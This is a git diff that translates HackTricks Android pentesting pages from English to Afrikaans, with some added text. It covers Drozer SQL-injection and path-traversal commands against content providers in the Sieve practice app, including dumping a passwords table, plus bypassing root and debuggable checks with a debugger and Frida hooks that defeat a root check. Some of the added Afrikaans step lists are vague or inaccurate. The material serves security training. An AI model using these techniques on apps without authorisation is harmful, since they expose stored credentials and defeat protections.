able to call them - -### Query content +Omdat jy hulle kan aanroep +### Navraaginhoud ``` dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical _id: 1 @@ -106,106 +99,134 @@ password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== - email: incognitoguy50@gmail.com ``` +### Voeg inhoud in -### Insert content - -Quering the database you will learn the **name of the columns**, then, you could be able to insert data in the DB: +Deur die databasis te ondervra, sal jy die **naam van die kolomme** leer, dan sal jy in staat wees om data in die DB in te voeg: ![](<../../../.gitbook/assets/image (188) (1).png>) ![](<../../../.gitbook/assets/image (189) (1).png>) -_Note that in insert and update you can use --string to indicate string, --double to indicate a double, --float, --integer, --long, --short, --boolean_ +_Merk op dat jy in die invoeging en opdatering --string kan gebruik om 'n string aan te dui, --double om 'n dubbel te dui, --float, --integer, --long, --short, --boolean_ -### Update content +### Werk inhoud by -Knowing the name of the columns you could also **modify the entries**: +Deur die naam van die kolomme te ken, kan jy ook die inskrywings **verander**: ![](<../../../.gitbook/assets/image (190).png>) -### Delete content +### Verwyder inhoud ![](<../../../.gitbook/assets/image (191).png>) -### **SQL Injection** +### **SQL-injectie** -It is simple to test for SQL injection **(SQLite)** by manipulating the **projection** and **selection fields** that are passed to the content provider.\ -When quering the Content Provider there are 2 interesting arguments to search for information: _--selection_ and _--projection_: +Dit is maklik om vir SQL-injectie te toets **(SQLite)** deur die **projeksie** en **seleksieveld** wat aan die inhoudverskaffer oorgedra word, te manipuleer.\ +Wanneer jy die Inhoudverskaffer ondervra, is daar 2 interessante argumente om na inligting te soek: _--selection_ en _--projection_: ![](<../../../.gitbook/assets/image (192) (1).png>) -You can try to **abuse** this **parameters** to test for **SQL injections**: - +Jy kan probeer om hierdie **parameters** te **misbruik** om vir **SQL-injecties** te toets: ``` -dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" +dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'" unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (') ``` ``` -dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* -FROM SQLITE_MASTER WHERE type='table';--" +dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* +FROM SQLITE_MASTER WHERE type='table';--" | type | name | tbl_name | rootpage | sql | -| table | android_metadata | android_metadata | 3 | CREATE TABLE ... | +| table | android_metadata | android_metadata | 3 | CREATE TABLE ... | | table | Passwords | Passwords | 4 | CREATE TABLE ... | ``` +**Outomatiese SQLInjection-ontdekking deur Drozer** -**Automatic SQLInjection discovery by Drozer** +Drozer is 'n kragtige hulpmiddel wat gebruik kan word vir die outomatiese ontdekking van SQLInjection-foute in Android-toepassings. Hierdie tegniek maak gebruik van die ingeboude funksionaliteit van Drozer om die inhoudverskaffers van 'n toepassing te ondersoek en potensiële SQLInjection-punte te identifiseer. +Om hierdie tegniek te gebruik, moet jy Drozer op jou toestel installeer en die toepassing wat jy wil ondersoek, geïnstalleer hê. Volg dan hierdie stappe: + +1. Begin deur Drozer op jou toestel te begin deur die volgende opdrag in die opdragreël in te voer: + ``` + drozer console connect + ``` + +2. Nadat jy suksesvol met die Drozer-konsole verbind het, kan jy die volgende opdrag gebruik om die inhoudverskaffers van die toepassing te lys: + ``` + run app.provider.find + ``` + +3. Kyk na die lys van inhoudverskaffers wat deur Drozer verskaf word en identifiseer die toepassing wat jy wil ondersoek. + +4. Gebruik die volgende opdrag om die inhoudverskaffer te ondersoek en potensiële SQLInjection-punte te identifiseer: + ``` + run app.provider.query content:// --projection --selection --selectionArgs + ``` + + Vervang `` met die URI van die inhoudverskaffer wat jy wil ondersoek. Vervang `` met die kolomnaam wat jy wil ondersoek. Vervang `` met die seleksievoorwaarde en `` met die seleksie-argumente wat jy wil gebruik. + +5. Drozer sal die resultate van die navraag vertoon en enige potensiële SQLInjection-punte aandui. + +Deur hierdie stappe te volg, kan jy Drozer gebruik om outomaties SQLInjection-foute in Android-toepassings te ontdek en te identifiseer. Dit is 'n kragtige tegniek wat jou kan help om die veiligheid van 'n toepassing te beoordeel en potensiële kwesbaarhede te identifiseer. ``` -dz> run scanner.provider.injection -a com.mwr.example.sieve -Scanning com.mwr.example.sieve... +dz> run scanner.provider.injection -a com.mwr.example.sieve +Scanning com.mwr.example.sieve... Injection in Projection: - content://com.mwr.example.sieve.DBContentProvider/Keys/ - content://com.mwr.example.sieve.DBContentProvider/Passwords - content://com.mwr.example.sieve.DBContentProvider/Passwords/ +content://com.mwr.example.sieve.DBContentProvider/Keys/ +content://com.mwr.example.sieve.DBContentProvider/Passwords +content://com.mwr.example.sieve.DBContentProvider/Passwords/ Injection in Selection: - content://com.mwr.example.sieve.DBContentProvider/Keys/ - content://com.mwr.example.sieve.DBContentProvider/Passwords - content://com.mwr.example.sieve.DBContentProvider/Passwords/ - +content://com.mwr.example.sieve.DBContentProvider/Keys/ +content://com.mwr.example.sieve.DBContentProvider/Passwords +content://com.mwr.example.sieve.DBContentProvider/Passwords/ + dz> run scanner.provider.sqltables -a jakhar.aseem.diva Scanning jakhar.aseem.diva... Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/: - android_metadata - notes - sqlite_sequence +android_metadata +notes +sqlite_sequence ``` +## **Lêerstelsel-gebaseerde Inhoudsverskaffers** -## **File System-backed Content Providers** - -Content providers could be also used to **access files:** +Inhoudsverskaffers kan ook gebruik word om toegang tot lêers te verkry: ![](<../../../.gitbook/assets/image (193).png>) -### Read **file** - -You can read files from the Content Provider +### Lees **lêer** +Jy kan lêers van die Inhoudsverskaffer lees. ``` -dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts +dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 127.0.0.1 localhost ``` +### **Pad Traversal** -### **Path Traversal** - -If you can access files, you can try to abuse a Path Traversal (in this case this isn't necessary but you can try to use "_../_" and similar tricks). - +As jy toegang tot lêers het, kan jy probeer om 'n Pad Traversal te misbruik (in hierdie geval is dit nie nodig nie, maar jy kan probeer om "_../_" en soortgelyke truuks te gebruik). ``` -dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts +dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts 127.0.0.1 localhost ``` +**Outomatiese Ontdekking van Paddeurdringendheid deur Drozer** -**Automatic Path Traversal discovery by Drozer** +Drozer is 'n kragtige hulpmiddel wat gebruik kan word vir die outomatiese ontdekking van paddeurdringendheid in Android-toepassings. Dit kan gebruik word om kwesbaarhede in inhoudsverskaffers te identifiseer en uit te buit. Hier is 'n stap-vir-stap handleiding oor hoe om Drozer te gebruik vir die outomatiese ontdekking van paddeurdringendheid: +1. Installeer Drozer op jou toestel of virtuele masjien. +2. Begin Drozer en maak 'n verbinding met die teiken-toepassing. +3. Gebruik die `run app.provider.find` bevel om alle inhoudsverskaffers in die teiken-toepassing te vind. +4. Analiseer die resultate en soek na enige kwesbaarhede of potensiële paddeurdringendheid. +5. As 'n kwesbaarheid gevind word, kan jy die `run app.provider.query` bevel gebruik om data uit die inhoudsverskaffer te onttrek. +6. Analiseer die onttrekte data en identifiseer enige sensitiewe inligting wat moontlik gelekte kan word. +7. Gebruik die gevonde kwesbaarhede om toegang tot beperkte data of funksies in die teiken-toepassing te verkry. + +Drozer is 'n kragtige hulpmiddel wat jou kan help om paddeurdringendheid in Android-toepassings te ontdek en uit te buit. Dit is belangrik om hierdie tegnieke verantwoordelik en wettig te gebruik, en slegs op toepassings waarvoor jy toestemming het om te toets. ``` -dz> run scanner.provider.traversal -a com.mwr.example.sieve -Scanning com.mwr.example.sieve... +dz> run scanner.provider.traversal -a com.mwr.example.sieve +Scanning com.mwr.example.sieve... Vulnerable Providers: - content://com.mwr.example.sieve.FileBackupProvider/ - content://com.mwr.example.sieve.FileBackupProvider +content://com.mwr.example.sieve.FileBackupProvider/ +content://com.mwr.example.sieve.FileBackupProvider ``` - -## References +## Verwysings * [https://www.tutorialspoint.com/android/android\_content\_providers.htm](https://www.tutorialspoint.com/android/android\_content\_providers.htm) * [https://manifestsecurity.com/android-application-security-part-15/](https://manifestsecurity.com/android-application-security-part-15/) @@ -213,14 +234,14 @@ Vulnerable Providers:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index 96d16dee0..0b0ae2d5e 100644 --- a/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -1,108 +1,88 @@ -# Exploiting a debuggeable application +# Uitbuiting van 'n toepassing wat gedebug kan word
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# **Bypassing root and debuggeable checks** +# **Om die wortel- en gedebug kan word kontroles te omseil** -This section of the post is a summary from the post [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) +Hierdie gedeelte van die pos is 'n opsomming van die pos [**https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0**](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) -## Steps to Make an Android App Debuggable and Bypass Checks +## Stappe om 'n Android-toepassing gedebug kan word te maak en kontroles te omseil -### **Making the App Debuggable** +### **Maak die toepassing gedebug kan word** -Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0 +Inhoud gebaseer op https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0 -1. **Decompile the APK:** - - Utilize the APK-GUI tool for decompiling the APK. - - In the _android-manifest_ file, insert `android:debuggable=true` to enable debugging mode. - - Recompile, sign, and zipalign the modified application. +1. **Ontbind die APK:** +- Gebruik die APK-GUI-hulpmiddel om die APK te ontbind. +- Voeg `android:debuggable=true` by in die _android-manifest_-lêer om die gedebug-modus te aktiveer. +- Hersaam, teken en zipalign die gewysigde toepassing. -2. **Install the Modified Application:** - - Use the command: `adb install `. +2. **Installeer die Gewysigde Toepassing:** +- Gebruik die opdrag: `adb install `. -3. **Retrieve the Package Name:** - - Execute `adb shell pm list packages –3` to list third-party applications and find the package name. +3. **Haal die Pakketnaam op:** +- Voer `adb shell pm list packages –3` uit om derdeparty-toepassings te lys en die pakketnaam te vind. -4. **Set the App to Await Debugger Connection:** - - Command: `adb shell am setup-debug-app –w `. - - **Note:** This command must be run each time before starting the application to ensure it waits for the debugger. - - For persistence, use `adb shell am setup-debug-app –w -–persistent `. - - To remove all flags, use `adb shell am clear-debug-app `. +4. **Stel die Toepassing in om op die gedebugger se verbinding te wag:** +- Opdrag: `adb shell am setup-debug-app –w `. +- **Let op:** Hierdie opdrag moet elke keer uitgevoer word voordat die toepassing begin om te verseker dat dit wag vir die gedebugger. +- Vir volharding, gebruik `adb shell am setup-debug-app –w -–persistent `. +- Om alle vlae te verwyder, gebruik `adb shell am clear-debug-app `. -5. **Prepare for Debugging in Android Studio:** - - Navigate in Android Studio to _File -> Open Profile or APK_. - - Open the recompiled APK. +5. **Maak gereed vir gedebugging in Android Studio:** +- Navigeer in Android Studio na _File -> Open Profile or APK_. +- Maak die hersaamde APK oop. -6. **Set Breakpoints in Key Java Files:** - - Place breakpoints in `MainActivity.java` (specifically in the `onCreate` method), `b.java`, and `ContextWrapper.java`. +6. **Stel breekpunte in sleutel Java-lêers:** +- Plaas breekpunte in `MainActivity.java` (spesifiek in die `onCreate`-metode), `b.java`, en `ContextWrapper.java`. -### **Bypassing Checks** +### **Kontroles omseil** -The application, at certain points, will verify if it is debuggable and will also check for binaries indicating a rooted device. The debugger can be used to modify app info, unset the debuggable bit, and alter the names of searched binaries to bypass these checks. +Die toepassing sal op sekere punte verifieer of dit gedebug kan word en sal ook kyk vir binêre lêers wat dui op 'n gewortelde toestel. Die gedebugger kan gebruik word om toepassingsinligting te wysig, die gedebugbare bit te verwyder, en die name van gesoekte binêre lêers te verander om hierdie kontroles te omseil. -For the debuggable check: +Vir die gedebug-klank: -1. **Modify Flag Settings:** - - In the debugger console's variable section, navigate to: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`. - - **Note:** The binary representation of `flags = 814267974` is `11000011100111011110`, indicating that the "Flag_debuggable" is active. +1. **Verander vlae-instellings:** +- In die veranderlike-afdeling van die gedebugger se konsole, navigeer na: `this mLoadedAPK -> mApplicationInfo -> flags = 814267974`. +- **Let op:** Die binêre voorstelling van `flags = 814267974` is `11000011100111011110`, wat aandui dat die "Flag_debuggable" aktief is. -![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png) +![https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png](https://miro.medium.com/v2/resize:fit:1400/1*-ckiSbWGSoc1beuxxpKbow.png) -These steps collectively ensure that the application can be debugged and that certain security checks can be bypassed using the debugger, facilitating a more in-depth analysis or modification of the application's behavior. +Hierdie stappe verseker gesamentlik dat die toepassing gedebug kan word en dat sekere sekuriteitskontroles omseil kan word deur die gedebugger te gebruik, wat 'n meer diepgaande analise of wysiging van die toepassing se gedrag fasiliteer. -Step 2 involves changing a flag value to 814267972, which is represented in binary as 110000101101000000100010100. +Stap 2 behels die verandering van 'n vlaewaarde na 814267972, wat binêr voorgestel word as 110000101101000000100010100. -# **Exploiting a Vulnerability** +# **Uitbuiting van 'n kwesbaarheid** -A demonstration was provided using a vulnerable application containing a button and a textview. Initially, the application displays "Crack Me". The aim is to alter the message from "Try Again" to "Hacked" at runtime, without modifying the source code. +'n Demonstrasie is verskaf met behulp van 'n kwesbare toepassing wat 'n knoppie en 'n teksvak bevat. Aanvanklik vertoon die toepassing "Crack Me". Die doel is om die boodskap van "Try Again" na "Hacked" te verander tydens uitvoering, sonder om die bronkode te wysig. -## **Checking for Vulnerability** -- The application was decompiled using `apktool` to access the `AndroidManifest.xml` file. -- The presence of `android_debuggable="true"` in the AndroidManifest.xml indicates the application is debuggable and susceptible to exploitation. -- It's worth noting that `apktool` is employed solely to check the debuggable status without altering any code. +## **Kontrole vir Kwesbaarheid** +- Die toepassing is ontbind met behulp van `apktool` om toegang te verkry tot die `AndroidManifest.xml`-lêer. +- Die teenwoordigheid van `android_debuggable="true"` in die AndroidManifest.xml dui daarop dat die toepassing gedebug kan word en vatbaar is vir uitbuiting. +- Dit is die moeite werd om op te merk dat `apktool` slegs gebruik word om die gedebugbare status te kontroleer sonder om enige kode te wysig. -## **Preparing the Setup** -- The process involved initiating an emulator, installing the vulnerable application, and using `adb jdwp` to identify Dalvik VM ports that are listening. -- The JDWP (Java Debug Wire Protocol) allows debugging of an application running in a VM by exposing a unique port. -- Port forwarding was necessary for remote debugging, followed by attaching JDB to the target application. +## **Die Opstel Voorberei** +- Die proses behels die begin van 'n emulator, die installeer van die kwesbare toepassing, en die gebruik van `adb jdwp` om Dalvik VM-poorte wat luister te identifiseer. +- Die JDWP (Java Debug Wire Protocol) maak dit moontlik om 'n toepassing wat in 'n VM loop te debug deur 'n unieke poort bloot te stel. +- Poort deurstuur was nodig vir afstandsbediening, gevolg deur die koppel van JDB aan die teiken-toepassing. -## **Injecting Code at Runtime** -- The exploitation was carried out by setting breakpoints and controlling the application flow. -- Commands like `classes` and `methods ` were used to uncover the application’s structure. -- A breakpoint was set at the `onClick` method, and its execution was controlled. -- The `locals`, `next`, and `set` commands were utilized to inspect and modify local variables, particularly changing the "Try Again" message to "Hacked". -- The modified code was executed using the `run` command, successfully altering the application’s output in real-time. +## **Kode inspuiting tydens uitvoering** +- Die uitbuiting is uitgevoer deur breekpunte te stel en die toepassing se vloei te beheer. +- Opdragte soos `classes` en `methods ` is gebruik om die struktuur van die toepassing te ondersoek. +- 'n Breekpunt is gestel by die `onClick`-metode, en die uitvoering daarvan is beheer. +- Die opdragte `locals`, `next`, en `set` is gebruik om plaaslike veranderlikes te ondersoek en te wysig, veral deur die "Try Again" boodskap na "Hacked" te verander. +- Die gewysigde kode is uitgevoer met behulp van die `run`-opdrag, wat die toepassing se uitset suksesvol in werklike tyd verander het. -This example demonstrated how the behavior of a debuggable application can be manipulated, highlighting the potential for more complex exploits like gaining shell access on the device in the application's context. - - - -## References -* [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) -* [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications) - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+Hierdie voorbeeld het gedemonstreer hoe die gedrag van 'n toepassing wat gedebug kan word, gemanipuleer kan word, en beklemtoon die potensiaal vir meer komple diff --git a/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md b/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md index 3d0507e1e..c23ddb6b0 100644 --- a/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md +++ b/mobile-pentesting/android-app-pentesting/frida-tutorial/README.md @@ -1,80 +1,75 @@ -# Frida Tutorial +# Frida Tutoriaal
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} -## Installation - -Install **frida tools**: +## Installasie +Installeer **frida-gereedskap**: ```bash pip install frida-tools pip install frida ``` - -**Download and install** in the android the **frida server** ([Download the latest release](https://github.com/frida/frida/releases)).\ -One-liner to restart adb in root mode, connect to it, upload frida-server, give exec permissions and run it in backgroud: +**Laai af en installeer** die **frida-bediener** in die Android-toestel ([Laai die nuutste vrystelling af](https://github.com/frida/frida/releases)).\ +Eenreël om adb in root-modus te herlaai, daarmee te verbind, frida-server op te laai, uitvoeringsregte te gee en dit agtergrond te laat loop: {% code overflow="wrap" %} ```bash -adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" +adb root; adb connect localhost:6000; sleep 1; adb push frida-server /data/local/tmp/; adb shell "chmod 755 /data/local/tmp/frida-server"; adb shell "/data/local/tmp/frida-server &" ``` {% endcode %} -**Check** if it is **working**: - +**Kyk** of dit **werk**: ```bash frida-ps -U #List packages and processes frida-ps -U | grep -i #Get all the package name ``` +## Tutoriale -## Tutorials +### [Tutoriaal 1](frida-tutorial-1.md) -### [Tutorial 1](frida-tutorial-1.md) - -**From**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ +**Vanaf**: [https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1](https://medium.com/infosec-adventures/introduction-to-frida-5a3f51595ca1)\ **APK**: [https://github.com/t0thkr1s/frida-demo/releases](https://github.com/t0thkr1s/frida-demo/releases)\ -**Source Code**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) +**Bronkode**: [https://github.com/t0thkr1s/frida-demo](https://github.com/t0thkr1s/frida-demo) -**Follow the [link to read it](frida-tutorial-1.md).** +**Volg die [skakel om dit te lees](frida-tutorial-1.md).** -### [Tutorial 2](frida-tutorial-2.md) +### [Tutoriaal 2](frida-tutorial-2.md) -**From**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Parts 2, 3 & 4)\ -**APKs and Source code**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) +**Vanaf**: [https://11x256.github.io/Frida-hooking-android-part-2/](https://11x256.github.io/Frida-hooking-android-part-2/) (Dele 2, 3 & 4)\ +**APK's en Bronkode**: [https://github.com/11x256/frida-android-examples](https://github.com/11x256/frida-android-examples) -**Follow the[ link to read it.](frida-tutorial-2.md)** +**Volg die [skakel om dit te lees](frida-tutorial-2.md).** -### [Tutorial 3](owaspuncrackable-1.md) +### [Tutoriaal 3](owaspuncrackable-1.md) -**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ +**Vanaf**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)\ **APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk) -**Follow the [link to read it](owaspuncrackable-1.md).** +**Volg die [skakel om dit te lees](owaspuncrackable-1.md).** -**You can find more Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) +**Jy kan meer Awesome Frida-skripte hier vind:** [**https://codeshare.frida.re/**](https://codeshare.frida.re) -## Quick Examples - -### Calling Frida from command line +## Vinnige Voorbeelde +### Frida vanaf die opdraglyn aanroep ```bash frida-ps -U @@ -87,9 +82,48 @@ frida -U --no-pause -l disableRoot.js -f owasp.mstg.uncrackable1 #frozen so that the instrumentation can occur, and the automatically #continue execution with our modified code. ``` +### Basiese Python-skrips -### Basic Python Script +```python +import frida +# Device +device = frida.get_usb_device() + +# Application +application = device.get_frontmost_application() +pid = application.pid + +# Session +session = device.attach(pid) + +# Script +script = session.create_script(""" +console.log('Hello, world!'); +""") + +# Load script +script.load() + +# Detach session +session.detach() +``` + +Hierdie is 'n basiese Python-skrips wat gebruik kan word met die Frida-raamwerk vir Android-app-pentesting. + +Die skrips maak gebruik van die `frida`-biblioteek om met die toestel te kommunikeer en die toepassing te ondersoek. + +Die skrips begin deur die toestel te kry wat aan die rekenaar gekoppel is deur die `frida.get_usb_device()`-funksie te gebruik. + +Dan word die voorste toepassing op die toestel gekry deur die `device.get_frontmost_application()`-funksie te gebruik. Die proses-ID (pid) van die toepassing word ook verkry. + +'n Sessie word geheg aan die toepassing deur die `device.attach(pid)`-funksie te gebruik. + +'n Skrips word geskep deur die `session.create_script()`-funksie te gebruik. Die skrips bevat 'n eenvoudige drukopdrag wat die boodskap "Hello, world!" na die konsole stuur. + +Die skrips word gelaai deur die `script.load()`-funksie te gebruik. + +Uiteindelik word die sessie losgemaak deur die `session.detach()`-funksie te gebruik. ```python import frida, sys @@ -100,138 +134,306 @@ print('[ * ] Running Frida Demo application') script.load() sys.stdin.read() ``` +### Hooking funksies sonder parameters -### Hooking functions without parameters - -Hook the function `a()` of the class `sg.vantagepoint.a.c` - +Haak die funksie `a()` van die klas `sg.vantagepoint.a.c` ```javascript Java.perform(function () { ; rootcheck1.a.overload().implementation = function() { - rootcheck1.a.overload().implementation = function() { - send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); - return false; - }; +rootcheck1.a.overload().implementation = function() { +send("sg.vantagepoint.a.c.a()Z Root check 1 HIT! su.exists()"); +return false; +}; +}); +``` +# Frida - 